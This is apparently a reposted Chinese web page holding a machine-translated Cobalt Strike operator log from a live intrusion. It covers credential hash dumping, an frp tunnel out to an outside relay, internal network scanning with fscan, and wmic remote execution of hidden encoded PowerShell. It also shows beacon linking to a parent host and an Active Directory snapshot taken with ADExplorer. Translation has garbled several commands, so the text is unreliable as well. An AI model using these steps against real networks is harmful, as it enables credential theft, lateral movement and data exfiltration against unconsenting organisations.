哈希转储
shell 任务列表/svc |findstr 2468
shell wmicologicaldisk 其中drivetype=3 获取deviceid
上传C:\Users\Alex\Desktop\tools\frp_0.37.1_windows_amd64\frpc.ini (C:\Users\Public\frpc.ini)。
外壳C:\User\Public\frpc.exe -c C:\User\Public\frpc.ini
上传C:\Users\Alex\Desktop\tools\fscan64.exe (C:\Users\Public\fscan64.exe)。
外壳C:\Users\Public\fscan64.exe -h 10.20.1.0/24
链接10.20.1.5
shell wmic /node:10.20.1.5 获取操作系统名称、OSArchitecture
shell wmic /node:10.20.1.5 process 获取进程ID、名称
与父beacon: 192.9.210.4 的链接丢失
[+] 已建立到父beacon: 192.9.210.4 的链接
[*] 具有睡眠30 秒任务的Beacon(30% 抖动)[更改为: Beacon 192.9.210.4@5668]
shell wmic /node:10.20.1.9 进程调用create 'cmd /c powershell -nop -w hide -encodedcommand
v
下载\\10.20.1.2\c$\Windows\win.ini ------------------
mkdir C:\Windows\Temp\temp
上传C:\Users\bighead\Desktop\ADExplorer.exe
shell C:\Windows\Temp\temp\ADExplorer.exe -snapshot '' C:\Windows\Temp\temp\ad.dat
标题:一次实战cs上执行命令要多久,一次实战cs上执行命令是什么
链接:https://yyuanw.com/news/xydt/7874.html
版权:文章转载自网络,如有侵权,请联系删除!